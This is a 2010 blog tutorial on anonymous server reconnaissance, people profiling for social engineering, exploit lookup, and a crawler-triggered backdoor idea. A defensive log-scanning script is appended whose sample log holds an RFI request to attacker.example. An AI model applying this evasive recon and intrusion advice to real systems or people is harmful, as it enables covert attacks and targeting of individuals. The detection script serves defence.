Thursday, 3 June 2010

How to hack the server and not get caught

Hi there,
In my first blog post I want to talk about a quick way to

"Hack the Server"

of any given website, using only web-based services that are available to everybody.
So why would we want to do this?
- It's available from everywhere (libraries, schools, museums ...)
- It's completely anonymous (you can find out a lot without even going to the site)
- It's quick
- It's clean (leaves no traces in logfiles)
Note: Please only use these techniques on networks you own or are allowed to pwn.

1) Ensure your own anonymity (at least to some degree).
We will be using Google Translate as our web proxy:
http://translate.google.de/translate?hl=en&sl=de&tl=en&u=wieistmeineip.de

//Of course your request will be logged on Google's servers, but the target server is only going to see a request from a Google IP address.

2) Find out what's behind the server and domain.
For this we are going to use
http://centralops.net/co/DomainDossier.aspx

It gives us a LOT of info about the domain, some basic info about the services running, and a traceroute.
//We will get to how to use the collected info later.

After that we will try to find out even more about the services with:
http://ping.eu/port-chk/
Some interesting ports:
SQL: 1433 (MySQL), 5432 (PostgreSQL), 1521 (Oracle)
Remote access: 3389 (Remote Desktop), 22, 23

Alright, we now know a lot about the domain and the server, but if we need to know even more:
http://www.iptools.com/
is THE most complete website for online IP tools.

3) Find out about the web apps.
Well, here it could get tricky for some sites, and this task is slow.
However, it should still be noted.
You could try using Google dorks for that; to save time use blackl.com instead of google.com (this is a real gem, basically it's Google, but without filtering/blocking requests).
Combine that with a list of dorks, OR use Goolag from the cDc (much faster, however you'll have to download this).

4) Finding out about the people
You can use online people searches:
http://pipl.com/
http://people.yahoo.com/
Social networks:
http://yoname.com/
Metacrawler:
http://www.metacrawler.com/
The best tool to do this is Maltego from Paterva (has to be downloaded):
http://www.paterva.com/

With the info about the people you can try to search for forum and newsgroup posts from them, which could contain info about the technology they are using.
Remember: if you target the people, then exploit the trust.

5) Use the info
With the information gathered you can find the actual vulnerabilities:
http://osvdb.org/
http://www.exploit-db.com/
http://www.3xpl01t.com/

6) Exploit the host
This cannot really be done without leaving traces in logs, but there are some ways that allow an attacker to perform this task in a very anonymous way!
For example, an attacker could craft a link for placing a backdoor (for example in the case of an RFI, OS command execution or an SQLi) that would, if executed, place a backdoor on the system; that link is then posted somewhere on the net.
Some search robot will pick it up and follow the link; by this the URL is executed by the crawler and the server is owned.
I have never done this or seen a case where it has been used, however I think it's possible to do.
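From the defender's side, the trick in step 6 does leave a footprint: a request with a search-engine User-Agent whose query parameter is itself a remote URL, usually with the page it was planted on as the Referer. As an added example (not code from the original post), this Python script parses access-log lines in the common "combined" format and flags exactly that pattern; the sample log lines, IPs and hostnames are constructed, and the User-Agent heuristic is an assumption (a real deployment would also check the source IP against the engine's published ranges).

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache/nginx "combined" log format (not real traffic).
# The second line is the footprint of a crawler-triggered RFI: a crawler User-Agent fetching
# a URL whose parameter value is another URL, with the forum page it was planted on as Referer.
SAMPLE_LOG = """\
66.249.66.1 - - [03/Jun/2010:10:12:01 +0200] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.1 - - [03/Jun/2010:10:12:05 +0200] "GET /index.php?page=http://attacker.example/payload.txt HTTP/1.1" 200 812 "http://forum.example/thread/42" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
10.0.0.7 - - [03/Jun/2010:10:13:00 +0200] "GET /index.php?page=contact HTTP/1.1" 200 3044 "-" "Mozilla/5.0 (Windows NT 6.1)"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Assumption: crawlers identify themselves with one of these words in the User-Agent.
# This is a heuristic; the UA can be spoofed, so treat it as a triage signal only.
CRAWLER_RE = re.compile(r"bot|crawler|spider|slurp", re.I)
# A parameter value that is itself an absolute URL is the classic RFI footprint.
URL_VALUE_RE = re.compile(r"^(?:https?|ftp)://", re.I)


def parse_line(line):
    """Return the fields of one combined-log line as a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def params_with_url(path):
    """Names of query parameters whose value starts with a URL scheme."""
    query = urlsplit(path).query
    return [k for k, v in parse_qsl(query, keep_blank_values=True) if URL_VALUE_RE.match(v)]


def find_crawler_triggered_rfi(log_text):
    """Flag requests where a crawler User-Agent fetched a URL carrying a remote URL in a parameter."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not CRAWLER_RE.search(rec["ua"]):
            continue
        for param in params_with_url(rec["path"]):
            hits.append({"ip": rec["ip"], "param": param, "path": rec["path"],
                         "referer": rec["referer"], "status": rec["status"]})
    return hits


if __name__ == "__main__":
    for hit in find_crawler_triggered_rfi(SAMPLE_LOG):
        print(f"crawler-triggered RFI attempt from {hit['ip']}: {hit['path']} (planted at {hit['referer']})")
```

A status of 200 on such a hit means the include went through; the fix on the application side is to never let a request parameter select the file to include, which makes the crawler trick harmless regardless of who follows the link.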

Have fun!
More Tutorials will follow.